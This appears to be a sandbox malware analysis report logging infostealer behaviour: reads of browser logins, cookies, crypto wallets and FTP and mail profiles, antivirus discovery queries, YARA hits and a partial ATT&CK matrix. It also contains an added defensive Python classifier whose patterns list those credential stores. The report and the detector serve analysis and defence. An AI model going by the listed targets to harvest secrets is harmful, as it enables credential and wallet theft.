Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,2_2_004720DB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00472C3F GetUserNameW,2_2_00472C3F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,2_2_0041E364
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,2_2_0040E500
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 16.2.svchost.exe.3189000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.3189000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.build.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
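The file and registry accesses above split cleanly by payload: neworigin.exe reads the WinSCP session key, profiles.ini of Firefox, Cyberfox, BlackHawk and Thunderbird, FTP Navigator's Ftplist.txt, the Windows Messaging Subsystem profile key and IncrediMail identities, while build.exe reads Chrome and Edge Login Data, Web Data, the cookie stores (including Firefox's cookies.sqlite) and the data directories of several wallets (atomic, Binance, Coinomi, Electrum, Ethereum, Exodus, Guarda, Jaxx). No legitimate program reads browser, wallet, FTP and mail stores from one process, so the robust detection is fan-out across store categories rather than any single path. The following is an added example, not part of the Joe Sandbox report: a Python classifier over file/registry-open events that maps paths to store categories and flags any process touching three or more. The sample rows are the paths from the report above (directory rows without their trailing separator) plus two constructed benign rows; the category names, patterns and threshold are this example's own assumptions.

```python
"""Classify credential-store accesses and flag processes that fan out across stores (added example)."""
import re
from collections import defaultdict

# (category, pattern) in priority order: first match wins, so Thunderbird's
# profiles.ini is classed as a mail store rather than a generic Mozilla profile.
CATEGORIES = [
    ("mail_client", r"\\Thunderbird\\profiles\.ini$|\\Windows Messaging Subsystem\\Profiles$|\\IncrediMail\\Identities$"),
    ("mozilla_profiles", r"\\profiles\.ini$"),
    ("browser_logins", r"\\User Data\\.*\\Login Data$"),
    ("browser_cookies", r"\\User Data\\.*Cookies$|\\cookies\.sqlite$"),
    ("browser_webdata", r"\\User Data\\.*\\Web Data$"),
    ("crypto_wallet", r"\\(?:Electrum|Exodus|Ethereum|atomic|Binance|Coinomi|Guarda|com\.liberty\.jaxx)(?:\\|$)"),
    ("ftp_client", r"\\FTP Navigator\\Ftplist\.txt$|\\WinSCP 2\\Sessions$"),
]
COMPILED = [(cat, re.compile(pat, re.I)) for cat, pat in CATEGORIES]

# (process, path) rows: the report's File opened / Key opened rows for build.exe and
# neworigin.exe, followed by two constructed benign rows that are not from the report.
EVENTS = [
    ("neworigin.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    ("build.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite"),
    ("build.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("neworigin.exe", r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    ("build.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    ("build.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("neworigin.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("build.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("build.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies"),
    ("neworigin.exe", r"C:\FTP Navigator\Ftplist.txt"),
    ("build.exe", r"C:\Users\user\AppData\Roaming\atomic"),
    ("build.exe", r"C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets"),
    ("build.exe", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    ("build.exe", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    ("neworigin.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    ("neworigin.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    ("neworigin.exe", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    # constructed benign rows: a browser reading its own store, and an unrelated document
    ("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("explorer.exe", r"C:\Users\user\Documents\quote.docx"),
]


def classify(path: str):
    """Return the store category for a file or registry path, or None if it is not a store."""
    for cat, rx in COMPILED:
        if rx.search(path):
            return cat
    return None


def profile_processes(events):
    """Map each process to the set of store categories it touched (unclassified paths ignored)."""
    prof = defaultdict(set)
    for proc, path in events:
        cat = classify(path)
        if cat:
            prof[proc.lower()].add(cat)
    return dict(prof)


def flag_harvesters(events, min_categories=3):
    """A single process reading three or more unrelated store categories is the stealer signal."""
    prof = profile_processes(events)
    return sorted((p, sorted(c)) for p, c in prof.items() if len(c) >= min_categories)


if __name__ == "__main__":
    for proc, cats in flag_harvesters(EVENTS):
        print(f"{proc}: {', '.join(cats)}")
```

Run against the rows above, build.exe is flagged on four categories and neworigin.exe on three, while the constructed chrome.exe row (a browser reading its own Login Data) stays under the threshold. The same classifier applies unchanged to EDR file-access telemetry or to Windows object-access audit events (4663) on these paths; the threshold, not the path list, is what keeps it quiet on a real fleet.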
Source: x.exe Binary or memory string: WIN_XP
Source: x.exe, 0000000D.00000000.1642698601.0000000000482000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: x.exe Binary or memory string: WIN_XPe
Source: x.exe Binary or memory string: WIN_VISTA
Source: x.exe Binary or memory string: WIN_7
Source: x.exe Binary or memory string: WIN_8
Source: Yara match File source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 16.2.svchost.exe.3189000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.svchost.exe.3189000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.build.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,4_2_004652BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_00476619
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,4_2_0046CEF3
MITRE ATT&CK Matrix (columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Each tactic is listed below with its 11 matrix cells in row order. Leading digits are the superscript hit counts attached to a cell in the rendered matrix, reproduced exactly as extracted; cells without digits had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: 13 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 331 Windows Management Instrumentation; 21 Native API; 2 Exploitation for Client Execution; 3 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 13 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
